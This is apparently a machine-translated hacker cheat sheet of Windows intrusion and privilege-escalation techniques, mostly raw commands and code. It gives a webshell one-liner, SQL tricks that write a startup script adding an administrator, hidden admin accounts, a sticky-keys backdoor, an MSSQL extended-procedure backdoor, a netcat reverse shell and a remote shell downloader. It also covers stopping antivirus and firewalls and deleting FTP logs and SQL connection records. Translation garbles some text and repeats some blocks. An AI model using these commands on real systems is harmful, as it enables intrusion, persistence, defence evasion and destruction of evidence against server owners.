Windows penetration and Elevation of Privilege: skills Summary

Route questions:
 
1. Read website configuration.
 
2. Use the following VBS:

On Error Resume NextIf (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") ThenMsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo"WScript.QuitEnd IfSet objservice = GetObject("IIS://LocalHost/W3SVC")For Each obj3w In objserviceIf IsNumeric(obj3w.Name) ThenSet OService = GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")If Err <> 0 Then WScript.Quit (1)WScript.Echo Chr(10) & "[" & OService.ServerComment & "]"For Each Binds In OService.ServerBindingsWeb = "{ " & Replace(Binds, ":", " } { ") & " }"WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "")NextWScript.Echo "Path            : " & VDirObj.PathEnd IfNext

 
3. List iis_spy (Note: The ASPX and IISSPY methods must be supported: downgrade activeds. dll and activeds. tlb ).
 
4. Obtain the target site directory. You can use "echo ^ <% execute (request (" cmd ") % ^ >>> X: \ target directory \ X. asp or copy script file X: \ target directory \ X. asp is written into webshell like the target directory, or you can try the type command.
 
Possible website directory (Note: generally virtual host type ):
Data/htdocs. website/
 
Knowledge and materials about VPN operation under CMD:
 
# Allow administrator to dial in the VPN:
Netsh ras set user administrator permit
 
# Disable administrator to dial the VPN:
 
Netsh ras set user administrator deny
 
# View which users can dial the VPN:
 
Netsh ras show user
 
# View the vpn ip Address Allocation Method:
Netsh ras ip show config
 
# Use the address pool to allocate IP addresses:
Netsh ras ip set addrassign method = pool
 
# The address pool ranges from 192.168.3.1 to 192.168.3.254:
Netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254
 
Cmd and Dos command lines to add SQL users:
 
You must have administrator permissions. Create a "c: \ test. qry" file under the command. The content is as follows:
 
 
Exec master. dbo. sp_addlogin test, 123
EXEC sp_addsrvrolemember 'test, 'sysadmin'
 
Then run cmd.exe/c isql-E/U alma/P/I c: \ test. qry in DOS.
 
Alternative addition of user methods:
 
In addition to deleting net.exe and not using adsi, the new user adding method is provided. The Code is as follows:
 
Js:
 

var o=new ActiveXObject( "Shell.Users" );z=o.create("test") ;z.changePassword("123456","")z.setting("AccountType")=3;

Vbs:
 

Set o=CreateObject( "Shell.Users" )Set z=o.create("test")z.changePassword "123456",""z.setting("AccountType")=3

Cmd access control permission control:
 
The command is as follows:
 
Cacls c:/e/t/g everyone: F # drive c everyone permission
 
Cacls "directory"/d everyone # everyone is not readable, including admin
 
Note:
 
In the Folder Security Settings, set Everyone to unreadable. If there is no security option, remove the tool-Folder option-use simple sharing.
 
3389 related, the following is better with PR:
 
A. Firewall TCP/IP filtering. (Disable: net stop yyagent & net stop sharedaccess)
 
Bw.intranet environment (lcx.exe)
 
C. The maximum allowed connection is exceeded on the terminal server (XP run: mstsc/admin; 2003 run: mstsc/console)
 
1. query the terminal port:
 
REG query HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server \ WinStations \ RDP-Tcp/v PortNumber
 
2. Enable the XP & 2003 terminal service:
 
 
Reg add hklm \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server/v fDenyTSConnections/t REG_DWORD/d 00000000/f
 
3. Change the terminal port to 2008 (hexadecimal: 0x7d8 ):
 
 
 
Reg add hklm \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server \ Wds \ rdpwd \ Tds \ tcp/v PortNumber/t REG_DWORD/d 0x7d8/f
Reg add hklm \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server \ WinStations \ RDP-Tcp/v PortNumber/t REG_DWORD/d 0x7D8/f
 
4. Remove the restrictions on Terminal Services and IP connection from the xp & 2003 system firewall:
Reg add hklm \ SYSTEM \ CurrentControlSet \ Services \ SharedAccess \ Parameters \ FirewallPolicy \ StandardProfile \ GloballyOpenPorts \ List/v 3389: TCP/t REG_SZ/d 3389: TCP: *: Enabled: @ xpsp2res. dll,-22009/f
 
 

Create table a (cmd text); insert into a values ("set wshshell = createobject (" "wscript. shell ""); insert into a values ("a = wshshell. run ("" cmd.exe/c net user admin/add "", 0) "); insert into a values (" B = wshshell. run ("" cmd.exe/c net localgroup administrators admin/add "", 0) "); select * from a into outfile" C: \ Documents and Settings \ All Users \ Start Menu \ Program \ Start \. vbs ";

 
BS horse's PortMap function, similar to LCX for forwarding. If ASPX is supported, this forward will be used to conceal the point. (Note: The function in a remote corner is ignored all the time)
 
Disable common software kill (remove all permissions of the file where the software kill is located ):
 
Handling abnormal Norton Enterprise Edition:
 

Create table a (cmd text); insert into a values ("set wshshell = createobject (" "wscript. shell ""); insert into a values ("a = wshshell. run ("" cmd.exe/c net user admin/add "", 0) "); insert into a values (" B = wshshell. run ("" cmd.exe/c net localgroup administrators admin/add "", 0) "); select * from a into outfile" C: \ Documents and Settings \ All Users \ Start Menu \ Program \ Start \. vbs ";

 
Coffee EE:
Net stop "McAfee McShield"
 
Symantec virus log:
 
C: \ Documents ents and Settings \ All Users \ Application Data \ Symantec Endpoint Protection \ Logs
 
Symantec virus backup:
 
C: \ Documents ents and Settings \ All Users \ Application Data \ Symantec Endpoint Protection \ Quarantine
 
Nod32 virus backup:
 
 
C: \ release E ~ 1 \ Administrator \ Local Settings \ Application Data \ ESET NOD32 Antivirus \ Quarantine
 
Nod32 remove password protection:
 
Delete "HKEY_LOCAL_MACHINE \ SOFTWARE \ ESET Security \ CurrentVersion \ Info \ PackageID ".
 
Install the shift backdoor five times, stick with the hold key backdoor, and replace the shift backdoor:
 
SHIFT for five times and stick with the backdoors:

copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.execopy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /ycopy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y

 
SHIFT backdoor replacement:
 
 

copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.execopy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /ycopy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y

 
Add a hidden system account:
 
1. Run the following command: "net user admin $123456/add & net localgroup administrators admin $/add ".
 
2. Export the two key values of the user under the Registry SAM.
 
3. Delete admin $ in the user management interface and export the backup registry back.
 
4. Use Hacker Defender to hide the relevant user registry.
 
Install MSSQL extension BACKDOOR:
 
USE master;
 
 
EXEC sp_addextendedproc 'xp _ helpsystem ', 'xp _ helpsystem. dll ';
 
GRANT exec On xp_helpsystem TO public;
 
Process server MSFTP logs:
 
Under "C: \ WINNT \ system32 \ LogFiles \ MSFTPSVC1 \", there are three files: ex011120.log/ex011121.log/ex011124.log. The deletion of ex0111124.log fails, and the "original file... Using ".
 
Of course, you can directly Delete "ex011120.log/ex011121.log ". Open "ex0111124.log" in notepad, delete some content, save, overwrite, and exit.
 
When the "msftpsvc" service is stopped, you can directly Delete the "ex011124.log ".
 
Clear MSSQL query analyzer connection records:
 
MSSQL 2000 is in the Registry as follows:
 
HKEY_CURRENT_USER \ Software \ Microsoft SQL Server \ 80 \ Tools \ Client \ PrefServers
 
Delete the received information.
 
MSSQL 2005 is in:
C: \ Documents and Settings \ <user> \ Application Data \ Microsoft SQL Server \ 90 \ Tools \ Shell \ mru. dat
 
Anti-BT system interception skills, you can use remote download shell:
 

<%Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl)Dim Ads, Retrieval, GetRemoteDataOn Error Resume NextSet Retrieval = Server.CreateObject("Microsoft.XMLHTTP")With Retrieval.Open "Get", s_RemoteFileUrl, False, "", "".SendGetRemoteData = .ResponseBodyEnd WithSet Retrieval = NothingSet Ads = Server.CreateObject("Adodb.Stream")With Ads.Type = 1.Open.Write GetRemoteData.SaveToFile Server.MapPath(s_LocalFileName), 2.Cancel().Close()End WithSet Ads = NothingEnd SubeWebEditor_SaveRemoteFile "your shell's name", "your shell'urL"%>

 
Remove TCP/IP Filtering:
 
TCP/IP filtering has three entries in the registry:
 
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Services \ Tcpip
 
 
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet002 \ Services \ Tcpip
 
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip
 
Use the following commands to export the registry key:
Regedit-e D: \ a. reg HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip
Regedit-e D: \ B. reg HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet002 \ Services \ Tcpip
Regedit-e D: \ c. reg HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip
 
Then put the following three files:
"EnableSecurityFilters" = dword: 00000001"
 
Changed:
"EnableSecurityFilters" = dword: 00000000"
 
Run the following commands to import the above three files to the registry:
Regedit-s D: \ a. reg
Regedit-s D: \ B. reg
 
Regedit-s D: \ c. reg
 
Tips for Webshell privilege escalation:
 
Cmd path:
C: \ windows \ temp \ cmd.exe
 
Nc is also in the same directory, such as reverse shell:
 
"C: \ windows \ temp \ nc.exe-vv ip 999-e c: \ windows \ temp \ cmd.exe"
 
Generally, it will not succeed.
 
Input the following directly in the cmd path:
 
C: \ windows \ temp \ nc.exe
 
Command input:
-Vv ip 999-e c: \ windows \ temp \ cmd.exe
 
But it can be successful .. This is not the focus
 
We usually need to follow the above method to successfully execute pr.exe or Churchill.
 
Run the following command to package RAR:
 
Rar a-k-r-s-m3 c: \ 1.rar c: \ folde
 
After reading the Windows version, do not miss the Linux version. Portal: Linux penetration and Elevation of Privilege: skills Summary
 
[Via @ 0x/t00ls/lcx]